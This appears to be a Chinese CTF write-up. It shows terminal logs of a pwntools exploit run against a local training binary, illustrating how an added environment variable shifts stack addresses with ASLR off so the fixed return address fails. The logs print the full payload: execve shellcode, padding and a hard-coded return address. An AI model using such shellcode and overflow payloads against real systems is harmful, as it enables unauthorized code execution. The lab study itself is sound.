# ASLR保护关闭情况下环境变量对栈地址的影响

Contents

## 环境变量悄悄作祟

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54    ~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  pwn 16:51:00 ❯ python exp1.py # 第一次执行攻击脚本 [+] Starting local process './level1' argv=[b'./level1'] : pid 116511 [DEBUG] Sent 0x90 bytes: 00000000 31 c9 f7 e1 51 68 2f 2f 73 68 68 2f 62 69 6e 89 │1···│Qh//│shh/│bin·│ 00000010 e3 b0 0b cd 80 61 61 61 61 61 61 61 61 61 61 61 │····│·aaa│aaaa│aaaa│ 00000020 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│ * 00000080 61 61 61 61 61 61 61 61 61 61 61 61 b0 d4 ff ff │aaaa│aaaa│aaaa│····│ 00000090 [*] Switching to interactive mode $ls [DEBUG] Sent 0x3 bytes: # 能够正常get shell并执行命令 b'ls\n' [DEBUG] Received 0x45 bytes: b'exp1.py level1 level1.c level2 pattern.py socat-2.0.0-b8.tar.gz\n' exp1.py level1 level1.c level2 pattern.py socat-2.0.0-b8.tar.gz$ [*] Stopped process './level1' (pid 116511)   ~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  5s  pwn 16:51:13 ❯ set -x var 123 # 添加一个环境变量 var = 123   ~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  pwn 16:51:27 ❯ python exp1.py # 第二次执行攻击脚本（添加环境变量后） [+] Starting local process './level1' argv=[b'./level1'] : pid 116661 [DEBUG] Sent 0x90 bytes: 00000000 31 c9 f7 e1 51 68 2f 2f 73 68 68 2f 62 69 6e 89 │1···│Qh//│shh/│bin·│ 00000010 e3 b0 0b cd 80 61 61 61 61 61 61 61 61 61 61 61 │····│·aaa│aaaa│aaaa│ 00000020 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│ * 00000080 61 61 61 61 61 61 61 61 61 61 61 61 b0 d4 ff ff │aaaa│aaaa│aaaa│····│ 00000090 [*] Switching to interactive mode [*] Got EOF while reading in interactive # get shell失败 $[*] Process './level1' stopped with exit code -11 (SIGSEGV) (pid 116661)   ~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  3s  pwn 16:51:35 ❯ set -e var # 删除设置的环境变量var   ~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  pwn 16:51:50 ❯ python exp1.py # 第三次执行攻击脚本 [+] Starting local process './level1' argv=[b'./level1'] : pid 116805 [DEBUG] Sent 0x90 bytes: 00000000 31 c9 f7 e1 51 68 2f 2f 73 68 68 2f 62 69 6e 89 │1···│Qh//│shh/│bin·│ 00000010 e3 b0 0b cd 80 61 61 61 61 61 61 61 61 61 61 61 │····│·aaa│aaaa│aaaa│ 00000020 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│ * 00000080 61 61 61 61 61 61 61 61 61 61 61 61 b0 d4 ff ff │aaaa│aaaa│aaaa│····│ 00000090 [*] Switching to interactive mode$ ls [DEBUG] Sent 0x3 bytes: # 可正常get shell并执行命令 b'ls\n' [DEBUG] Received 0x45 bytes: b'exp1.py level1 level1.c level2 pattern.py socat-2.0.0-b8.tar.gz\n' exp1.py level1 level1.c level2 pattern.py socat-2.0.0-b8.tar.gz